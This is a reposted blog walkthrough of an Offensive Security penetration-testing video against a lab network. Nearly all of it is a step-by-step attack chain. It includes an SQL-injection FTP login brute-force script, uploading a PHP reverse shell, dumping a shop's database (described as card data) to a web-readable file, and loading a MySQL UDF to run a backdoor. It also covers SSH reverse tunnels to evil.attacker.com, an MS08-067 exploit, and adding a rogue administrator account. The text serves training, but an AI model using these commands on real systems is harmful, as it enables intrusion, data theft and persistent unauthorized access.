Monday, September 12, 2011

HOWTO : Penetration Testing in the Real World

*** Do NOT attack any computer or network without authorization or you may be put into jail. ***

Credit to : muts (of Offensive Security)

This is muts's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

Penetration Testing in the Real World from Offensive Security on Vimeo.


ftp-brute.py

#!/usr/bin/python
from ftplib import FTP
print "Attempting user Directory Discover via FTP"
for i in range(0,6):

   username=%') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser LIMIT "+ STR(I)+",1; --  "
   password=str("1")
   ftp=FTP('www.offseclabs.com')
   ftp.login(username,password)
   print "Logged in as user "+str(i)+",1"
   ftp.retrlines('LIST')
   ftp.close()


Commands


Open Terminal A :

nmap -p 21,80 www.offseclabs.com
nc -v www.offseclabs.com 80
HEAD / HTTP/1.0
(To enumerate the webserver)
clear

ftp www.offseclabs.com
username - bob
password - bob
(To enumerate the ftp server)

ftp www.offseclabs.com
username - %') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser; --  
password - 1

(logged in to the ftp server)
pwd
ls
bye

clear

cd core
clear
nano brute.py --> (see above ftp-brute.py)
./brute.py
(get the fifth user who has mapped to the root directory of webserver)
clear

ftp www.offseclabs.com
username - %') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser LIMIT 5,1; --  
password - 1

(logged in as the fifth user)
ls
put rs.php --> (a reverse php shell)

-----------------------
Open Terminal B :

nc -lvp 80

-----------------------
Open Terminal C :

wget www.offseclabs.com/rs.php

(Then, at Terminal B, we got a reverse shell)

-----------------------
Go back to Terminal B :
(inside the reverse shell)

/sbin/ifconfig
pwd
cd /var/www
ls -la
cd includes
cat configure.php
(get the MySQL username and password as well as MySQL server address and database name)

mysqldump -u root -p1q2w3e4r5t6y -h 10.150.0.5 oscommerce > /var/www/images/ccdump.txt

------------------------
Open a Firefox :

www.offseclabs.com/images/ccdump.txt
(we got the database dump)

-------------------------
Go back to Terminal A :

(inside the ftp server)
put up.html --> (file upload html file)
put up.php -- > (file upload php file)

-------------------------
Open Firefox :

www.offseclabs.com/up.html

(upload lib_mysqludf_sys.so and marked it as 1)
(upload rs [a binary reverse shell) and marked it as 2)

** Details of lib_mysqludf_sys.so

---------------------------
Go back to Terminal A :

(quit the ftp server)
bye
clear
exit
(quit Terminal A)

----------------------------
Go back to Terminal B :

mysql -u root -p1q2w3e4r5t6y -h 10.150.0.5
(login to MySQL server)
use pwn;
SELECT imgdata from binfile where title="1" into dumpfile '/usr/lib/lib_mysqludf_sys.so';
SELECT imgdata from binfile where title="2" into dumpfile '/tmp/db';

CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';

SELECT sys_eval('chmod 755 /tmp/bd');
SELECT sys_eval('/tmp/bd &');
(don't press Enter at this moment)

---------------------------
Open Terminal D :

nc -lvp 80

(go back to Terminal B and press enter, you will get reserver shell at Terminal D)

----------------------------
Open Terminal E :

nc -lvp 80

----------------------------
Go back to Terminal B :

(inside the MySQL server)
SELECT sys_eval('/tmp/bd &');

(press enter and we got another reverse shell at Terminal E)

---------------------------
Go back to Terminal E :

(inside the reverse shell)
ping -c 1 10.150.0.20
clear

ssh -l root -t -t -R 445:10.150.0.20:445 evil.attacker.com
(create a remote tunnel at port 445)

-----------------------------
Open Terminal F :

netstat antp
nmap -sS 127.0.0.1 -p445 --script smb-check-vulns.nse

-----------------------------
Go back to Terminal D :

ssh -l root -t -t -R 4444:10.150.0.20:4444 evil.attacker.com
(create a remote tunnel at port 4444)

clear

------------------------------
Go back to Terminal F :

cd core
nano nx.py --> (a ms08-067 python exploit for win2k3 sp2)
clear
./nx.py 127.0.0.1
nc -v 127.0.0.1 4444

(we got a remote shell of 10.150.0.20)
ip config
net user hacker hacker /add
net localgroup administrators hacker /add

---------------------------------
Go back to Terminal D :

(quit the tunnel)
exit
clear

ssh -l root -t -t -R 3389:10.150.0.20:3389 evil.attacker.com
(create another remote tunnel on port 3389)
clear

-----------------------------------
Open Terminal G :

netstat -antp | grep LISTEN
clear
rdesktop 127.0.0.1

(login to the 10.150.0.20 with username - hacker and password - hacker)


That's all! See you.